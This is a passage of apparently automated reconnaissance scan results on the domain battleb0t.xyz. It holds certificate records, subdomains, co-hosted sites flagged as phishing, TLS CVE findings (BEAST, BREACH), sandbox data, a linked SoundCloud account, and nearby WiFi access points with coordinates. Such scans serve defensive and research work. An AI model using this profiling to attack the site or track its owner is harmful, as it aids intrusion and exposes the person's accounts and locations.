c6pc0He7b74SJmOSUiuQxRkMAdn7aLxFKSJtNSR0ZdpLQ9dlGi1JxpD7/d85O8/tneGmPT6gBS3EA1UAhZeJ4h6IIrLuKIYPwbjlFyl85+NuZplr6Ik/LqVxdKC3cHpO1LKKabH3SyC9+3vVB5oMxpndSz/IXkGxjt0qGjmqCOIe5uNjj9RZmK4KfVnj/H2pH1Gdg/wW4YAgLyEhUN3eQxK5KYkgN3lkOaAA+rny0daX16StZbJ+qWgrHncl8KVqm3Eud8XLUR/YUr7xTy8Dvxt0WFew3MEXPkSMAmdAtrJpPFuBJa8=', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:00:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.57): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:19 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/Altpapier | Altpapier |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 230.30.196.104.bc.googleusercontent.com | 104.196.30.230 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00d.github.io]
https://www.openphish.com/feed.txt | 00d.github.io |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.109.153 | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f605eb97732c7-EWR | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:48:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 2, u'threat_score': 39, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'scale.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b74_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_b74_IESQMMUTEX_0_519"\n "IsoScope_b74_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b74_IE_EarlyTabStart_0xc7c_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1057', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-573', u'attck_id': u'T1057', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "SCODEF:2932 CREDAT:275457 /prefetch:2" (UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1057', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-573', u'attck_id': u'T1057', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "SCODEF:2932 CREDAT:275457 /prefetch:2" (UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-21', u'name': u'Launches a browser', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Launches browser "iexplore.exe" (UID: 00000000-00003740)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "13.227.78.82:443"\n "104.17.24.14:443"\n "142.251.214.130:80"\n "104.17.68.176:443"\n "157.240.22.25:80"\n "157.240.22.25:443"\n "13.227.74.4:443"\n "13.227.74.28:443"\n "104.19.154.83:443"\n "104.17.214.204:443"\n "34.107.204.85:443"\n "142.251.46.238:443"\n "142.251.214.130:443"\n "142.250.191.34:443"\n "13.227.74.9:443"\n "216.239.32.178:443"\n "151.101.24.157:443"\n "169.150.221.147:443"\n "104.16.101.12:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.googleadservices.com"\n "connect.facebook.net"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"analytics.twitter.com"\n "connect.facebook.net"\n "data.pendo.io"\n "js.hs-banner.com"\n "track.hubspot.com"\n "ws.zoominfo.com"\n "www.googleadservices.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<!DOCTYPE html><html><head><meta charSet="utf-8"/><title>Accelerate the Development of AI Applications | Scale AI</title><meta name="description" content="Trusted by world class companies\n Scale delivers high quality training data for AI applications such as self-driving cars\n mapping\n AR/VR\n robotics\n and more."/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@scale_AI"/><meta name="twitter:creator" content="@scale_AI"/><meta property="og:title" content="Accelerate the Development of AI Applications | Scale AI"/><meta property="og:description" content="Trusted by world class companies\n Scale delivers high quality training data for AI applications such as self-driving cars\n mapping\n AR/VR\n robotics\n and more."/><meta property="og:url" content="https://scale.com/"/><meta property="og:type" content="website"/><meta property="og:image" content="https://www.scale.com/static/images/global/facebook.png"/><meta property="og:image:alt" content="OG Image Alt"/><meta propert" (Indicator: "twitter")\n "ite">press@scale.com</a></li><div class="flex gap-3 mt-8 text-neutral-400"><a href="https://twitter.com/scale_ai"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M7.55 21.75c9.055 0 14.008-7.503 14.008-14.008 0-.21-.004-.426-.014-.637A9.999 9.999 0 0024 4.555c-.898.4-1.85.66-2.826.774a4.95 4.95 0 002.165-2.723 9.897 9.897 0 01-3.126 1.195 4.93 4.93 0 00-8.394 4.49A13.985 13.985 0 011.673 3.15a4.93 4.93 0 001.523 6.57 4.93 4.93 0 01-2.23-.614v.061a4.922 4.922 0 003.95 4.828 4.894 4.894 0 01-2.221.085A4.934 4.934 0 007.292 17.5 9.875 9.875 0 010 19.54a13.969 13.969 0 007.55 2.211z"></path></svg></a><a href="https://www.facebook.com/scaleapi"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M24.147 12.073C24.147 5.405 18.74 0 12.073 0S0 5.405 0 12.073C0 18.1 4.415 23.094 10.187 24v-8.437H7.12v-3.49h" (Indicator: "facebook.com")\n "3.066v-2.66c0-3.025 1.802-4.697 4.56-4.697 1.32 0 2.703.236 2.703.236v2.971h-1.523c-1.5 0-1.967.93-1.967 1.887v2.263h3.348l-.535 3.49H13.96V24c5.772-.906 10.187-5.9 10.187-11.927z"></path></svg></a><a href="https://www.linkedin.com/company/scaleai"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" class="w-5 h-5 duration-300 ease-in-out fill-current transition-color hover:text-white"><path d="M22.223 0H1.772C.792 0 0 .773 0 1.73v20.536C0 23.222.792 24 1.772 24h20.451c.98 0 1.777-.778 1.777-1.73V1.73C24 .773 23.203 0 22.223 0zM7.12 20.452H3.558V8.995H7.12v11.457zM5.34 7.434a2.064 2.064 0 110-4.125 2.063 2.063 0 010 4.125zm15.112 13.018h-3.558v-5.57c0-1.326-.024-3.037-1.852-3.037-1.851 0-2.133 1.449-2.133 2.944v5.663H9.356V8.995h3.413v1.566h.047c.473-.9 1.636-1.852 3.365-1.852 3.605 0 4.27 2.372 4.27 5.457v6.286z"></path></svg></a></div></ul></li></ul></nav><div class="flex text-xs md:text-sm justify-between flex-col md:flex-row pt-6 md:mt-12 pb-12 border-neutral-800 border-t"><span class="text-neutr" (Indicator: "linkedin.com")\n ""nonGoogleScripts":["__bzi","__twitter_website_tag"]}" (Indicator: "twitter")\n "{state:0,transportUrl:b,context:c,parent:Kl()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ia+"&cx=c";ns()&&(f+="&sign="+Jh.We);var g=Sh||Uh?ms(b,f):void 0;g||(g=Yo("https://","http://",Jh.ve+f));El().destination[a]={state:1,context:c,parent:Kl()};mc(g)}};function os(){if(Cl()){return!0}return!1};var rs=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ss={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ts={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "function Sy(a,b){var c=this;return b}Sy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ty=["www.youtube.com","www.youtube-nocookie.com"],Uy,Vy=!1;" (Indicator: "youtube")\n "g})};return{store:function(g,h){var m=f(g);m?m.button=h:e.push({form:g,button:h})},get:function(g){var h=f(g);return h?h.button:null}}}function d(e,f,g,h,m){var n=Kv("fsl",g?"nv.mwt":"mwt",0),p;p=g?Kv("fsl","nv.ids",[]):Kv("fsl","ids",[]);if(!p.length)return!0;var q=Gv(e,"gtm.formSubmit",p),r=e.action;r&&r.tagName&&(r=e.cloneNode(!1).action);q["gtm.elementUrl"]=r;P(121);"https://www.facebook.com/tr/"===r&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===r)return!0;m&&(q["gtm.formSubmitElement"]=" (Indicator: "facebook.com")\n "var dw=function(a,b,c){function d(){var g=a();f+=e?(Va()-e)*g.playbackRate/1E3:0;e=Va()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Kg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Kg*h):Math.round(n.Hi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Mk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Gv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":Ly(d.verticalThresholds,b,"vert.pct")}Kv("sdl","init",!1)?Kv("sdl","pending",!1)||J(function(){return My()}):(Iv("sd | 185.199.110.153 |
| 2023-05-12 02:58:47 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | ayhu.xyz |
| 2023-05-12 02:50:34 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.109.153]
https://www.virustotal.com/en/ip-address/185.199.109.153/information/ | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom (Net ID: 00:01:38:A4:44:3A) | 37.780462,-122.390564 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:0B:41) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:59:52 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | nwapi2.battleb0t.xyz |
| 2023-05-12 02:55:01 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 188.114.96.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jones (Net ID: 00:04:5A:2E:16:19) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-oo2.github.io]
https://www.openphish.com/feed.txt | 0-oo2.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0080004.github.io | 185.199.111.153 |
| 2023-05-12 02:53:49 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8000::153:80 | 2606:50c0:8000::153 |
